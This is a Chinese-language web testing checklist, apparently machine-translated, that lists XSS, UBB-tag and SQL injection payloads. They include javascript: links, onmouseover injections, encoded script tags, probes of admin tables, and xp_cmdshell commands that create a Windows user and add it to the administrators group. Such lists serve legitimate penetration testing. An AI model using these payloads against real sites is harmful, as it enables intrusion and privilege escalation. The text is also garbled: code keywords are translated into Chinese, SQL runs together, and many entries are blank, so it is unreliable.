1.尝试使用各种方法输入UBB代码,例如不完整代码、代码嵌套等。
2、在UBB代码中添加属性,如style、storm等属性,看看是否有效
3.输入编辑器中不存在的UBB代码,看看是否有效
[url=javascript:alert('hello')]链接[/url]
[email=javascript:alert('hello')]电子邮件[/email]
[email=yangtao@rising.com.cn]yangtao@rising.com.cn[/email]
[img][/img]
[img]“onsmouseover=alert('你好');”[/img]
[b]诗歌苦服务网[/b]
[i]一二三四五六七 广州[/i]
[u]一二三四五六七 广州[/u]
[font=Google雅黑"]一二三四五六七上海[/font]
[size=4"]一二三四五六七 广州[/size]
[color=Red"]一二三四五六七上海[/color]
[align=center"]一二三四五六七 广州[/align]
[float=left"]一二三四五六七上海[/float]
[font=谷歌雅黑]1234567广州[/font]
[size=4]上海一二三四五六七[/size]
[color=Red]一二三四五六七 广州[/color]
[align=center]一二三四五六七上海[/align]
[列表=1]
[*]一二三四五六七 广州[/list]
[缩进]1234567上海[/缩进]
[float=left]一二三四五六七 广州[/float]
[媒体=ra,400,300,0][/媒体]
输出编码
常用的测试输入语句有:
1.jpg “Onmοuseover=”alert('xss')
” >
#39;;警报('xss');var/a='a
'">xss&<
a=””;b=”;警报(/xss/);//”
“'”
'''
”“”
”“”
”“”
“'”
标题=“”
将输出数据与输出数据进行比较,看看是否存在问题。
避免SQL注入
行政 -
'或者 -
'and()执行插入*%chrmid
and1=1;And1=1;aNd1=1;char(97)char(110)char(100)char(49)char(61)char(49);%20AND%201=2
'and1=1;'and1=1;'aNd1=1;
且1=2;'且1=2
且2=2
和用户>0
and(selectcount(*)fromsysobjects)>0
and(selectcount(*)frommsysobjects)>0
and(SelectCount(*)fromAdmin)>=0
and(selecttop1len(用户名)fromAdmin)>0(用户名已知数组)
;execmaster..xp_cmdshell "netusernamepassword /add"—
;execmaster..xp_cmdshell "netlocalgroupnameadministrators/add"—
and0(selectcount(*)fromadmin)
简单如wherextype='U',字符U对应的ASCII码是85,所以可以用wherextype=char(85)来代替; 如果字符是英文网站功能测试用例模板,例如wherename='user',则可以使用wherename=nchar(29992) +nchar(25143)。
跨站脚本攻击 (XSS)
对于 XSS网站功能测试用例模板,只需查看 HTML 输出并查看您的输入在哪里。 它在 HREF 标记中吗? 它位于 IFRAME 标记内吗? 它在 CLSID 标签中吗? 是在 IMGSRC 吗? 各个 Flash 内容的 PARAMNAME 是什么?
★
★%3C输入/%3E
★%3Cscript%3Ealert('XSS')%3C/script%3E
★
★
★
★
★
★
★javascript:警报(/xss/)
★javascript:警报(/xss/)
★
★
★
★='>
★1.jpg "Onmοuseoover="alert('xss')
★">
★#39;;alert('xss');var/a='a
★'">xss&<
★“onmοuseover=alert('你好');”
★&{警报('你好');}
★>>>>
★>%22%27>
★>>>>
★AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
★%22%2巴勒特(%27XSS%27)%2B%22
★
★
★
★
目录